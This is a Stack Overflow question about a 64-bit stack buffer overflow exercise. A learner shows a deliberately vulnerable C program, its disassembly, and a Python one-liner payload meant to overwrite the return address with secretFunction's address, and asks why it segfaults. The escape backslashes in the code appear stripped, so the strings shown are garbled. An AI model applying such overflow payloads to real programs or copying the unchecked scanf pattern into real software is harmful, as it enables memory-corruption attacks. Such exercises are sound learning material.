ubuntu - Buffer Overflow Exploit - Getting Segmentation Fault

Question

I am trying this code for Buffer Overflow Exploit. I compiled the code using gcc for 64 bit, disabled ASLR and allowed stack-smashing. I am not very good at reading assembly code but what I understood from the code was that 32 bytes(0x20) of memory was reserved for local variables which included the buffer(0x20). So I ran the python code to print 40 bytes(32 bytes + 8 bytes for rbp) junk + the address of secretFunction(). I am getting 'Segmentation Fault'. How to fix this?

Here is the C code:

#include <stdio.h>

void secretFunction(){
    printf("You are now inside the secret function!
");
}
void echo(){
    char buffer[20];
    printf("Enter some text
");
    scanf("%s", buffer);
    printf("You entered : %s
", buffer);
}
int main()
{
    echo();
    return 0;
}

This is how I compiled:

gcc main.c -o example -fno-stack-protector

And here is the part of the assembly code:

0000000000001189 <secretFunction>:
    1189:   f3 0f 1e fa             endbr64 
    118d:   55                      push   %rbp
    118e:   48 89 e5                mov    %rsp,%rbp
    1191:   48 8d 3d 70 0e 00 00    lea    0xe70(%rip),%rdi        # 2008 <_IO_stdin_used+0x8>
    1198:   e8 d3 fe ff ff          callq  1070 <puts@plt>
    119d:   90                      nop
    119e:   5d                      pop    %rbp
    119f:   c3                      retq   

00000000000011a0 <echo>:
    11a0:   f3 0f 1e fa             endbr64 
    11a4:   55                      push   %rbp
    11a5:   48 89 e5                mov    %rsp,%rbp
    11a8:   48 83 ec 20             sub    $0x20,%rsp
    11ac:   48 8d 3d 7d 0e 00 00    lea    0xe7d(%rip),%rdi        # 2030 <_IO_stdin_used+0x30>
    11b3:   e8 b8 fe ff ff          callq  1070 <puts@plt>
    11b8:   48 8d 45 e0             lea    -0x20(%rbp),%rax
    11bc:   48 89 c6                mov    %rax,%rsi
    11bf:   48 8d 3d 7a 0e 00 00    lea    0xe7a(%rip),%rdi        # 2040 <_IO_stdin_used+0x40>
    11c6:   b8 00 00 00 00          mov    $0x0,%eax
    11cb:   e8 c0 fe ff ff          callq  1090 <__isoc99_scanf@plt>
    11d0:   48 8d 45 e0             lea    -0x20(%rbp),%rax
    11d4:   48 89 c6                mov    %rax,%rsi
    11d7:   48 8d 3d 65 0e 00 00    lea    0xe65(%rip),%rdi        # 2043 <_IO_stdin_used+0x43>
    11de:   b8 00 00 00 00          mov    $0x0,%eax
    11e3:   e8 98 fe ff ff          callq  1080 <printf@plt>
    11e8:   90                      nop
    11e9:   c9                      leaveq 
    11ea:   c3                      retq   

00000000000011eb <main>:
    11eb:   f3 0f 1e fa             endbr64 
    11ef:   55                      push   %rbp
    11f0:   48 89 e5                mov    %rsp,%rbp
    11f3:   b8 00 00 00 00          mov    $0x0,%eax
    11f8:   e8 a3 ff ff ff          callq  11a0 <echo>
    11fd:   b8 00 00 00 00          mov    $0x0,%eax
    1202:   5d                      pop    %rbp
    1203:   c3                      retq   
    1204:   66 2e 0f 1f 84 00 00    nopw   %cs:0x0(%rax,%rax,1)
    120b:   00 00 00 
    120e:   66 90                   xchg   %ax,%ax

And at last here is the Python code during run:

python -c 'print "a"*40 + "x89x11x00x00x00x00x00x00"' | ./example

question from:https://stackoverflow.com/questions/65862659/buffer-overflow-exploit-getting-segmentation-fault

Answer 1

Waitting for answers